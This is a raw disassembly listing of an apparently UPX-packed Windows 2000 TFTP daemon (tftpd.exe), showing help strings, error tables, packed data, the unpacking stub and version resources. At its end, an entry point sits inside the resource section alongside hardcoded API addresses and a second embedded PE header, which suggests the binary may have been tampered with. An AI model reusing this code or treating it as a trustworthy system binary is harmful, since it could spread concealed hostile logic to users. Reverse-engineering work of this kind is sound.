db ' ValidWriteFiles- only matching files will be accepted, eg. "w'
db '*.txt" ',0Ah
db ' '
db ' ',0Ah
db 'Client: '
db ' ',0Ah
db ' tftp [-i] servername {get|put} src_file dest_file '
db ' ',0Ah
db ' -i from binary mode, else ascii mode is used. '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' ================================================================'
db '======== ',0Ah,0
align 8
aTftpd db 'Tftpd',0 ; DATA XREF: sub_1001665+B�o
; seg000:off_1005CB0�o
align 10h
off_1005CB0 dd offset aTftpd ; DATA XREF: sub_1001570:loc_1001646�o
; "Tftpd"
dd offset sub_1001665
align 10h
off_1005CC0 dd offset aErrorUndefined ; DATA XREF: sub_100230A+73�r
; "Error undefined"
dd offset aFileNotFound ; "File not found"
dd offset aAccessViolatio ; "Access violation"
dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
dd offset aUnknownTransfe ; "Unknown transfer ID"
dd offset aFileAlreadyExi ; "File already exists"
dd offset aNoSuchUser ; "No such user"
dd offset aOptionNegotiat ; "Option negotiation failure"
align 8
dword_1005CE8 dd 2Ah, 0Dh dup(0) ; sub_10037BF+87�o
dword_1005D20 dd 2Ah, 0Dh dup(0) ; sub_100333A+163�o ...
dword_1005D58 dd 2Ah, 0Dh dup(0) ; sub_10037BF+EA�o
dword_1005D90 dd 2Ah, 0Ch dup(0) ; sub_10037BF+11A�o
dword_1005DC4 dd 1 align 10h
dword_1005DD0 dd 0 ; sub_1001E73:loc_1001F36�r ...
dword_1005DD4 dd 0 dword_1005DD8 dd 0 ; sub_1001665:loc_100182E�r ...
dword_1005DDC dd 0 ; sub_1001665+8B�r ...
dword_1005DE0 dd 0 ; sub_1001E73:loc_1001F0C�r ...
align 8
dword_1005DE8 dd 0 ; sub_1001A91+2B3�o
dword_1005DEC dd 0 ; sub_1001A1F+52�r ...
dword_1005DF0 dd 0 ; sub_1001A1F+5E�w ...
dword_1005DF4 dd 0 ; sub_1001A91+59�w ...
dword_1005DF8 dd 0 ; sub_10018DB+EF�r
dword_1005DFC dd 0 dword_1005E00 dd 0 ; sub_1002219+D5�o
db 3 dup(0)
dword_1005E07 dd 0 ; sub_1003910+6B�r ...
align 4
dd 7Ch dup(0)
dword_1005FFC dd 0 dword_1006000 dd 0 dword_1006004 dd 0 dword_1006008 dd 0 dword_100600C dd 0 dd 4 dup(0)
dword_1006020 dd 6 dup(0) ; seg000:01001D78�o ...
dword_1006038 dd 0 ; sub_10018DB+34�w ...
dword_100603C dd 0 dword_1006040 dd 0 ; sub_1001DEB:loc_1001E35�r
dword_1006044 dd 0 ; sub_1001665+DB�r ...
dword_1006048 dd 6 dup(0) dword_1006060 dd 6 dup(0) ; sub_1001A1F+2�o ...
dword_1006078 dd 0 ; sub_10019F0+F�w ...
dword_100607C dd 0 dword_1006080 dd 6 dup(0) ; sub_100287F+1�o ...
dword_1006098 dd 0 ; sub_10018DB+25�w ...
dword_100609C dd 0 dword_10060A0 dd 0 ; sub_10018DB+A2�r ...
dd 7 dup(0)
dword_10060C0 dd 0 ; sub_1001665:loc_1001857�o
dword_10060C4 dd 0 dword_10060C8 dd 0 dword_10060CC dd 0 dd 0Ch dup(0)
dword_1006100 dd 4 dup(0) ; sub_1002219:loc_10022E9�o
dword_1006110 dd 0 align 10h
dword_1006120 dd 0 ; sub_1001665+63�o ...
dword_1006124 dd 0 ; sub_1001665+D1�w ...
dword_1006128 dd 0 ; sub_1001665+E1�w
dword_100612C dd 0 ; sub_1001E73+5A�w ...
dword_1006130 dd 0 ; sub_1001E73+60�w ...
dword_1006134 dd 0 ; sub_1001665+EB�w ...
dword_1006138 dd 0 ; sub_1001665+F1�w ...
align 10h
dword_1006140 dd 64h dup(0) dword_10062D0 dd 0FFFFFFFFh dword_10062D4 dd 0FFFFFFFFh dword_10062D8 dd 0 align 1000h
seg000 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 1007000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_1007000 dd 400h dup(0) dd 0C4h, 1Ch, 69784501h, 6F725074h, 73736563h, 78450100h
dd 646E6170h, 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h
dd 417367h, 74654701h, 61636F4Ch, 6D69546Ch, 44010065h
dd 74656C65h, 69724365h, 61636974h, 6365536Ch, 6E6F6974h
dd 65530100h, 73614C74h, 72724574h, 100726Fh, 45746553h
dd 746E6576h, 65520100h, 656D7573h, 65726854h, 1006461h
dd 4C746547h, 45747361h, 726F7272h, 61570100h, 6F467469h
dd 6E695372h, 4F656C67h, 63656A62h, 43010074h, 74616572h
dd 65764565h, 41746Eh, 696E4901h, 6C616974h, 43657A69h
dd 69746972h, 536C6163h, 69746365h, 1006E6Fh, 70616548h
dd 61657243h, 1006574h, 7661654Ch, 69724365h, 61636974h
dd 6365536Ch, 6E6F6974h, 65480100h, 72467061h, 1006565h
dd 736F6C43h, 6E614865h, 656C64h, 746E4501h, 72437265h
dd 63697469h, 65536C61h, 6F697463h, 4901006Eh, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 69615701h
dd 726F4674h, 746C754Dh, 656C7069h, 656A624Fh, 737463h
dd 61654801h, 6C6C4170h, 100636Fh, 65736552h, 65764574h
dd 100746Eh, 65656C53h, 54010070h, 6E457972h, 43726574h
dd 69746972h, 536C6163h, 69746365h, 1006E6Fh, 70737553h
dd 54646E65h, 61657268h, 0D1000064h, 0
dd 1000000h, 4F676552h, 4B6E6570h, 78457965h, 53010041h
dd 74726174h, 76726553h, 43656369h, 446C7274h, 61707369h
dd 65686374h, 1004172h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 65520100h, 6F6C4367h, 654B6573h, 52010079h
dd 73696765h, 53726574h, 69767265h, 74436563h, 61486C72h
dd 656C646Eh, 1004172h, 53746553h, 69767265h, 74536563h
dd 73757461h, 0DE0000h, 1380000h, 4E010000h, 6669746Fh
dd 64644179h, 61684372h, 65676Eh, 74654701h, 64417049h
dd 61547264h, 656C62h, 0EB00h, 7C00h, 695F0100h, 7474696Eh
dd 6D7265h, 675F5F01h, 616D7465h, 72616E69h, 1007367h
dd 65735F5Fh, 65737574h, 74616D72h, 72726568h, 6C5F0100h
dd 6B656573h, 635F0100h, 65736F6Ch, 725F0100h, 646165h
dd 6C616D01h, 636F6Ch, 61657201h, 636F6C6Ch, 63660100h
dd 65736F6Ch, 72660100h, 1006565h, 656D6974h, 635F0100h
dd 72696468h, 655F0100h, 6F6E7272h, 6D5F0100h, 7269646Bh
dd 6F660100h, 6E6570h, 69746301h, 100656Dh, 6E6F635Fh
dd 6C6F7274h, 1007066h, 6378655Fh, 5F747065h, 646E6168h
dd 3372656Ch, 5F5F0100h, 5F746573h, 5F707061h, 65707974h
dd 5F5F0100h, 665F5F70h, 65646F6Dh, 5F5F0100h, 635F5F70h
dd 6F6D6D6Fh, 1006564h, 6A64615Fh, 5F747375h, 76696466h
dd 72700100h, 66746E69h, 5F5F0100h, 5F5F5F70h, 74696E69h
dd 766E65h, 63585F01h, 69467470h, 7265746Ch, 655F0100h
dd 746978h, 706F5F01h, 1006E65h, 6972775Fh, 1006574h, 74697865h
dd 0F60000h, 1440000h, 6D010000h, 6F6D6D65h, 1006576h
dd 6E727473h, 797063h, 75736901h, 72657070h, 6F740100h
dd 65776F6Ch, 52010072h, 70556C74h, 65746164h, 656D6954h
dd 52010072h, 65446C74h, 6574656Ch, 656D6954h, 5F010072h
dd 69727473h, 706D63h, 6F746101h, 5F010069h, 616F7469h
dd 74520100h, 7265446Ch, 73696765h, 57726574h, 45746961h
dd 5F010078h, 736B6863h, 1006B74h, 436C7452h, 74616572h
dd 6D695465h, 75517265h, 657565h, 6C745201h, 69676552h
dd 72657473h, 74696157h, 74520100h, 6572436Ch, 54657461h
dd 72656D69h, 1000000h, 0F40000h, 57010000h, 6F534153h
dd 74656B63h, 6FFF0041h, 73FF00h, 41535701h, 6E657645h
dd 6C655374h, 746365h, 10009FFh, 47415357h, 764F7465h
dd 616C7265h, 64657070h, 75736552h, 0FF00746Ch, 5701000Fh
dd 65524153h, 72467663h, 0FF006D6Fh, 5701000Ah, 6C434153h
dd 4565736Fh, 746E6576h, 3FF00h, 0FF000CFFh, 37FF0002h
dd 17FF00h, 14FFh, 0
dd 4550h, 3014Ch, 3 dup(0)
dd 30F00E0h, 0C05010Bh, 3400h, 1800h, 0
dd 3A50h, 1000h, 5000h, 1000000h, 1000h, 200h, 2 dup(5)
dd 4, 0
dd 8000h, 600h, 0EDCBh, 80000003h, 40000h, 1000h, 100000h
dd 1000h, 0
dd 10h, 2 dup(0)
dd 3BFCh, 8Ch, 7000h, 3D8h, 6 dup(0)
dd 1180h, 1Ch, 8 dup(0)
dd 238h, 88h, 1000h, 180h, 6 dup(0)
dd 7865742Eh, 74h, 3310h, 1000h, 3400h, 600h, 3 dup(0)
dd 60000020h, 7461642Eh, 61h, 12DCh, 5000h, 0E00h, 3A00h
dd 3 dup(0)
dd 0C0000040h, 7273722Eh, 63h, 3D8h, 7000h, 400h, 4800h
dd 3 dup(0)
dd 40000040h, 7000h, 3E08h, 749C0000h, 39000000h, 17C60D00h
dd 0EB2E4A64h, 0C60F575Fh, 0B675827h, 0ECE325B7h, 0CCD6CF10h
dd 59EDDE72h, 4339F017h, 0B3BF0F49h, 0D81474A3h, 0D356F440h
dd 0F34912FBh, 0F9E28B41h, 7C9B3D2Dh, 408BCE3Bh, 0A74F620h
dd 0B36820ECh, 301BFAD8h, 9A3516EBh, 6CD26FC5h, 439C9B51h
dd 0F0C30D83h, 0ED3AA501h, 2F32104Dh, 832C6909h, 0F5501D57h
dd 9060C060h, 447262Eh, 69295C54h, 9F0404FBh, 0FF840F55h
dd 0ABFF70B8h, 98147D81h, 0F01EB5A2h, 0F8942804h, 7D6FD685h
dd 558B38EBh, 3939B90Ch, 2A7E104Dh, 0AD4B0A2Dh, 750D8F01h
dd 85DBFF53h, 575936Fh, 112E2780h, 8488D68Ah, 0FE009035h
dd 0BE3C46FFh, 196D2AB5h, 297FB102h, 5256D97Ch, 0FA0F1Eh
dd 0A378E8FAh, 0D8CAF6h, 8B9D12EBh, 88087C7h, 81E68A60h
dd 5A1A9634h, 68A15356h, 0B41C0FF2h, 0F0108A68h, 128D8016h
dd 5351630h, 440DCD00h, 86F4EA5h, 380929F2h, 0B6D8321Dh
dd 586CDB68h, 40367508h, 6DF44CF8h, 0CCD1B2A4h, 504F8D71h
dd 0B50C8948h, 0F07D4899h, 0B7174A1Eh, 40B0E86h, 3752239h
dd 0B1C8E4C5h, 37326A6Eh, 5CE8315Fh, 9A012DCh, 343F516Bh
dd 65739809h, 3201BC5Bh, 321C30FFh, 0E464D957h, 2FB45D20h
dd 20472758h, 5C908827h, 244BF51Fh, 0FD0C1519h, 4B87C3FCh
dd 1F5F5EC0h, 8005EC81h, 0E087023Dh, 57A9A8EDh, 0E8A00FBDh
dd 0D70B0538h, 48096855h, 0A4553517h, 6F55959Ch, 546237ADh
dd 5755ED20h, 0ADCE78EBh, 0B902AA58h, 0F72BFB9Ah, 0F01485C9h
dd 7B980FBh, 0B7FF524Eh, 818D2F77h, 0C68606h, 5C38805Ch
dd 0CD3B2C74h, 85658103h, 1E5CBFEBh, 3B252637h, 36E96CFBh
dd 4D4FCD8Bh, 0FC434BCDh, 8B24A158h, 0FC0D894Fh, 9150005Fh
dd 5D556BE3h, 16C3AE63h, 8E06FF88h, 0B3068A98h, 742A3C4Ah
dd 743F3C1Ch, 7A56DA0Bh, 6F3A57DBh, 0AC514132h, 15730CEEh
dd 0E23625E0h, 0EB46CE26h, 54210917h, 3CDB4A0Ah, 5068D670h
dd 0D43814E2h, 0EE0F1D1Ah, 84188EA3h, 410AFC0Fh, 6E235CA6h
dd 0CC01380Bh, 2333116Ch, 25FFE19Bh, 3805096Ch, 2B76793Ch
dd 0FF6ABDD8h, 68C56068h, 0A164F2F0h, 0EF0B1343h, 8964548Eh
dd 0E0320725h, 0AF68127h, 0E8658970h, 8B530F4Ah, 647EE736h
dd 5C704C4h, 4362D0h, 47C4D409h, 0C81C416Ch, 0E7EF0C15h
dd 80775B3h, 815CC0Dh, 0CD0A110h, 0B6E77C23h, 2CD8FA08h
dd 0A1DC2BA8h, 0E845DC4h, 0DCD937E0h, 5878D068h, 68AC1B84h
dd 503D9DB6h, 2A507A64h, 470816A2h, 0CF81DB37h, 0A5D85504h
dd 8D510062h, 1BDB2355h, 0E52E0DBh, 0E44D3DD4h, 14803F51h
dd 0AF92DD3h, 88003AF2h, 0A16DEDD8h, 46852CB5h, 0D44D3CE0h
dd 3460C51h, 52E4DD8Eh, 146C051Eh, 0FE6750F9h, 0ECCF6D52h
dd 0DCEC1F22h, 0D04D8909h, 0B76C5150h, 9C3EF9B6h, 2FFF8BC3h
dd 0E0A152D0h, 9867B616h, 0F047EC0Ch, 0DE160D26h, 8BD77577h
dd 90C35DE5h, 51DC5500h, 25E6CD74h, 0CC7C05h, 3BE7B068h
dd 5F680AD0h, 90F24Fh, 30AC2D85h, 80D0F9Eh, 4FBE466Bh
dd 0BCC0h, 807201h, 92A33D20h, 0A200FFFh, 74736241h, 74636172h
dd 0C003203Ah, 200AF556h, 69AD6854h, 3FFF595h, 61EA6D40h
dd 4652206Eh, 38372043h, 0F6002033h, 20A95776h, 6F186164h
dd 0B64A2E6Eh, 497EAAD6h, 966C2074h, 0B56F4546h, 705EDD55h
dd 360F726Fh, 0B0723639h, 0F652F556h, 0B0657571h, 1DEE95h
dd 70733329h, 564A7761h, 61B6AAE5h, 26F46887h, 0B7557B76h
dd 0A06F7253h, 5468630Eh, 1D942C02h, 0D8004A2Eh, 0A98007Fh
dd 535520E8h, 0A0454741h, 0AAB78004h, 6C6174D9h, 56C82329h
dd 7B958A42h, 26DBC00h, 3A648A6Dh, 2326A2Fh, 28009858h
dd 7FFF6550h, 297342F6h, 6F634A2Eh, 2F207970h, 686F4D2Fh
dd 0ED6E6973h, 41FB4333h, 3039705Fh, 2E5C6357h, 19377865h
dd 2EB023DAh, 4D637395h, 76DBB2B7h, 99203EB6h, 0D505062h
dd 0AB3D68h, 54596CFCh, 76696795h, 73165865h, 2770A063h
dd 59574A91h, 0A5EA66B0h, 9E63E049h, 632E36D0h, 266D56Bh
dd 116465A2h, 4EF08112h, 16373F76h, 0C13A8402h, 845173E2h
dd 0E2B07650h, 59E0662Dh, 53802D00h, 3323841Ch, 0E02C4ECDh
dd 0F0044A6Bh, 4A956446h, 0ACAAD813h, 5B954B73h, 0C61775F8h
dd 5D81642Dh, 66046512h, 3010885Dh, 43352B4Ah, 0ED0856C0h
dd 491E2030h, 0E2DAE0Fh, 2E09BA76h, 8772F083h, 64407014h
dd 0F4940B23h, 0D9CE2E4Dh, 6116B40Ah, 6930544Ah, 56300252h
dd 0DA920138h, 72CE8046h, 0E01488D9h, 0F146C602h, 0C9ADB5C9h
dd 1D6272A6h, 29241B75h, 0D95A4A9Ah, 6E43834Ah, 7146D5C0h
dd 0EF5B0577h, 966E6E75h, 78D08129h, 0E163388Eh, 0E0B020DAh
dd 0C7B25003h, 4AEB945Bh, 14314AEBh, 5664AB58h, 0B040D130h
dd 73BB6947h, 300AF003h, 0B89D9B50h, 0CE0408C4h, 63EB0C66h
dd 0C184F041h, 2F20BBAFh, 0C26063BBh, 629B7D15h, 6D6F2579h
dd 0B03190C4h, 2D96953Ah, 0DB043C64h, 47796CA5h, 600A65B6h
dd 61C057DDh, 2E796907h, 1A029CE0h, 0D0494C43h, 5CB36BE1h
dd 51829B4Ch, 6062B2Eh, 51682AC1h, 93D61DA0h, 0C5436D09h
dd 0CE17856Dh, 96A09943h, 676464E0h, 734FB66Fh, 2EB8EEF1h
dd 77630C95h, 7982654Ch, 7333756Fh, 3FFFD8DFh, 22E01F15h
dd 2E373531h, 382E3535h, 222A2E3Fh, 8925B93h, 63952456h
dd 204BC3C3h, 72657456h, 0B2B61136h, 43229394h, 386B2EC8h
dd 65946F6Eh, 0B2932E58h, 526EBC21h, 0BD624663h, 92DB8690h
dd 58CB785Eh, 93827672h, 666EC7FDh, 22702C74h, 742E2A72h
dd 4822743Fh, 16458F57h, 48495D7Bh, 6B39A509h, 46CD7086h
dd 3A787747h, 0E5181121h, 4E0E3AF2h, 0BD11C00Bh, 7041F845h
dd 35D69C2h, 677B6172h, 5C2DBDE2h, 0C707C68h, 6372147Dh
dd 3614E15Fh, 0D685D173h, 58BD4A09h, 0C44B42Ah, 41B96D6Eh
dd 38286B43h, 4D336F21h, 83DE3C6Ch, 108870C0h, 2D5904F0h
dd 11C6821Eh, 2AC08101h, 5EE04145h, 0EE54A367h, 0B260A07h
dd 16653ED8h, 9A69D8BBh, 0C8905BA6h, 7890B403h, 9B670164h
dd 244050A6h, 2A2B14h, 0EB6416C2h, 905B037h, 8200C8C1h
dd 0C4080009h, 366FA031h, 78451C43h, 0B8507469h, 7C40BEDAh
dd 45E7700Ch, 1169766Eh, 0A8AB1B6Eh, 0BA537109h, 2A661A41h
dd 65477DBAh, 61254C74h, 0BB0D386Ch, 44F6E205h, 650F6C65h
dd 1369A643h, 0B3086553h, 0F3638A39h, 3B185324h, 84973515h
dd 6DB4450Dh, 9FBA39Bh, 36755D52h, 0B365ED54h, 254A2913h
dd 36446157h, 46B6E6F7h, 53675308h, 4B6A624Fh, 2EDC4314h
dd 3DA52276h, 676E497Bh, 20DB2BB6h, 48717A17h, 0D8177027h
dd 0B2CCDB2h, 4621764Ch, 2BBF735Ch, 6F6C431Fh, 0E0486573h
dd 537DEA67h, 2C7928E6h, 2D6C1549h, 194135A2h, 0B02A0A64h
dd 30EC9EDh, 6C754DA2h, 64A47025h, 73ECF731h, 2E6C415Ah
dd 0B02FEDE1h, 2253DBB7h, 54067065h, 53647972h, 8382975h
dd 287073DBh, 0D1000E64h, 6EDB7090h, 4F674337h, 37654B18h
dd 67BF578h, 210A1D4h, 0B6957443h, 44768899h, 11063669h
dd 8952B41h, 0F0513147h, 7B17312Eh, 112E06AFh, 370C3EE0h
dd 2D6B980Bh, 3BF83E7Bh, 0B586EB5Bh, 74625614h, 45DE828Ch
dd 38366DBCh, 0A26F4E01h, 0FA417966h, 0CCBB708Eh, 672F6843h
dd 7049AC65h, 0E9F05410h, 0EBA68246h, 695F7CADh, 0CEBA20DCh
dd 0A6D6295h, 616DC15Fh, 41C35ED7h, 850E2B88h, 0AEBA5D56h
dd 0AD5D1A39h, 656C1172h, 0B866D06Bh, 0A16307D7h, 301F0807h
dd 3C9B99D8h, 1F66080Dh, 8067F766h, 33B3AF8Ah, 43696468h
dd 0BB76470Ch, 0F6F6E49h, 6F666B6Dh, 0C518E2Bh, 256306DBh
dd 7670667Dh, 29F88BB6h, 685F1678h, 0ED9133F1h, 5F0C2FB5h
dd 745F70ACh, 90F3579h, 0C44CCDD6h, 0B21665Fh, 360D6D3Dh
dd 970B7113h, 637B756Ah, 5B05ED76h, 727055DEh, 0F0236669h
dd 0B445AEEFh, 58766ECDh, 0FD9E5E63h, 62D7338Ah, 8E06166Dh
dd 0AF0B345Fh, 1407181Dh, 6B44F657h, 0A2ED74CDh, 0C45A765Fh
dd 5B5F63Ch, 759EA143h, 0B4743F8Eh, 0EFF157A7h, 5208776Fh
dd 0E4556C74h, 9D92D662h, 0F660F66h, 0EDBE0C3h, 6369F337h
dd 696F236Dh, 26610680h, 610478Dh, 0DA9EF72h, 8DB6291h
dd 6B0F6B34h, 0AC6C1E1Dh, 32446639h, 30521401h, 5918831h
dd 0A6DB5A25h, 6F4BFD3h, 53415357h, 6FFF850Dh, 0B82B7302h
dd 0E6116231h, 127B9A53h, 64476983h, 764F2509h, 748B6239h
dd 0ED39254Fh, 0D0F1A6Ch, 74A15B22h, 5F7F7663h, 0ED960A0Fh
dd 29A43149h, 0C0203FFh, 65883102h, 14173759h, 40FFF2A7h
dd 4550FEh, 3014C00h, 30F00E0h, 0C05010Bh, 5E933400h, 2718D837h
dd 810043Ah, 6E4EC33Fh, 3020B63h, 3C040005h, 0A8A476C8h
dd 0EDCB2C80h, 4E4030Dh, 3704D9BEh, 10431004h, 72CF2E4h
dd 708C3BFCh, 0CABB03D8h, 11802BCEh, 0A933800h, 88AC1889h
dd 2FB48064h, 2EE177D8h, 2674787Fh, 0C1EB9033h, 6B0BB71h
dd 60022023h, 90F8242Eh, 0FB5B906Eh, 270E12DCh, 78A36C3Ah
dd 2EC040B9h, 0C3004F72h, 1841B29Bh, 27481070h, 1B40h
dd 3E08F7DCh, 97E9C0Dh, 0FF000000h, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_1007000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_1009032
; ---------------------------------------------------------------------------
align 8
loc_1009028: ; CODE XREF: UPX1:loc_1009039�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_100902E: ; CODE XREF: UPX1:010090C6�j
; UPX1:010090DD�j
add ebx, ebx
jnz short loc_1009039
loc_1009032: ; CODE XREF: UPX1:01009020�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_1009039: ; CODE XREF: UPX1:01009030�j
jb short loc_1009028
mov eax, 1
loc_1009040: ; CODE XREF: UPX1:0100904F�j
; UPX1:0100905A�j
add ebx, ebx
jnz short loc_100904B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_100904B: ; CODE XREF: UPX1:01009042�j
adc eax, eax
add ebx, ebx
jnb short loc_1009040
jnz short loc_100905C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_1009040
loc_100905C: ; CODE XREF: UPX1:01009051�j
xor ecx, ecx
sub eax, 3
jb short loc_1009070
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_10090E2
mov ebp, eax
loc_1009070: ; CODE XREF: UPX1:01009061�j
add ebx, ebx
jnz short loc_100907B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_100907B: ; CODE XREF: UPX1:01009072�j
adc ecx, ecx
add ebx, ebx
jnz short loc_1009088
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_1009088: ; CODE XREF: UPX1:0100907F�j
adc ecx, ecx
jnz short loc_10090AC
inc ecx
loc_100908D: ; CODE XREF: UPX1:0100909C�j
; UPX1:010090A7�j
add ebx, ebx
jnz short loc_1009098
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_1009098: ; CODE XREF: UPX1:0100908F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_100908D
jnz short loc_10090A9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_100908D
loc_10090A9: ; CODE XREF: UPX1:0100909E�j
add ecx, 2
loc_10090AC: ; CODE XREF: UPX1:0100908A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_10090CC
loc_10090BD: ; CODE XREF: UPX1:010090C4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_10090BD
jmp loc_100902E
; ---------------------------------------------------------------------------
align 4
loc_10090CC: ; CODE XREF: UPX1:010090BB�j
; UPX1:010090D9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_10090CC
add edi, ecx
jmp loc_100902E
; ---------------------------------------------------------------------------
loc_10090E2: ; CODE XREF: UPX1:0100906C�j
pop esi
mov edi, esi
mov ecx, 61h
loc_10090EA: ; CODE XREF: UPX1:010090F1�j
; UPX1:010090F6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_10090EF: ; CODE XREF: UPX1:01009114�j
cmp al, 1
ja short loc_10090EA
cmp byte ptr [edi], 0
jnz short loc_10090EA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_10090EF
lea edi, [esi+7000h]
loc_100911C: ; CODE XREF: UPX1:0100913E�j
mov eax, [edi]
or eax, eax
jz short loc_1009167
mov ebx, [edi+4]
lea eax, [eax+esi+93D0h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+945Ch]
xchg eax, ebp
loc_1009139: ; CODE XREF: UPX1:0100915F�j
mov al, [edi]
inc edi
or al, al
jz short loc_100911C
mov ecx, edi
jns short near ptr loc_100914A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_100914A: ; CODE XREF: UPX1:01009142�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+9460h]
or eax, eax
jz short loc_1009161
mov [ebx], eax
add ebx, 4
jmp short loc_1009139
; ---------------------------------------------------------------------------
loc_1009161: ; CODE XREF: UPX1:01009158�j
call dword ptr [esi+9464h]
loc_1009167: ; CODE XREF: UPX1:01009120�j
popa
jmp loc_1003A50
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 100A000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 3 dup(0)
dd 10000h, 10h, 80000018h, 3 dup(0)
dd 10000h, 1, 80000030h, 3 dup(0)
dd 10000h, 409h, 48h, 0A05Ch, 374h, 2 dup(0)
dd 7060h, 340374h, 560000h, 5F0053h, 450056h, 530052h
dd 4F0049h, 5F004Eh, 4E0049h, 4F0046h, 0
dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
dd 3Fh, 0
dd 40004h, 1, 3 dup(0)
dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
dd 66006Eh, 6Fh, 2B0h, 300001h, 300034h, 300039h, 420034h
dd 30h, 16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
dd 65006Dh, 0
aMicrosoftCorpo:
unicode 0, <Microsoft Corporation>,0
aR:
unicode 0, <r%>
dd 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h
dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
unicode 0, <TCP/IP Trivial file transfer daemon.>,0
align 4
a8 db '8',0
dw 0Ch
dd 460001h, 6C0069h, 560065h, 720065h, 690073h, 6E006Fh
dd 0
a5_00_2134_1:
unicode 0, <5.00.2134.1>,0
a4:
unicode 0, <4>
dw 0Ah
dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h
dd 65h, 660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h, 690072h
dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh, 66006Fh
dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h, 310038h
dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h, 65h, 660074h
dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
unicode 0, <Microsoft(R) Windows (R) 2000 Operating System>,0
align 10h
db '<',0
dw 0Ch
dd 500001h, 6F0072h, 750064h, 740063h, 650056h, 730072h
dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
dd 31h, 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h
dd 6F0066h, 0
dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
dd 6E006Fh, 0
dd 4B00409h, 3 dup(0)
dd 0A494h, 0A45Ch, 3 dup(0)
dd 0A4A1h, 0A46Ch, 3 dup(0)
dd 0A4AEh, 0A474h, 3 dup(0)
dd 0A4BBh, 0A47Ch, 3 dup(0)
dd 0A4C6h, 0A484h, 3 dup(0)
dd 0A4D0h, 0A48Ch, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 76D63B9Ch, 0
; ---------------------------------------------------------------------------
sbb eax, edx
retn 77h
; ---------------------------------------------------------------------------
align 4
dd 7C924C29h, 0
dd 71AB2C69h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 7069006Ch, 61706C68h, 642E6970h, 4D006C6Ch
dd 52435653h, 6C642E54h, 746E006Ch, 2E6C6C64h, 6C6C64h
dd 5F325357h, 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h
dd 65470000h, 6F725074h, 64644163h, 73736572h, 78450000h
dd 72507469h, 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh
dd 65470000h, 41704974h, 54726464h, 656C6261h, 72660000h
dd 6565h, 696F7461h, 2B4h dup(0)
assume ds:seg000
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_100B02D
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
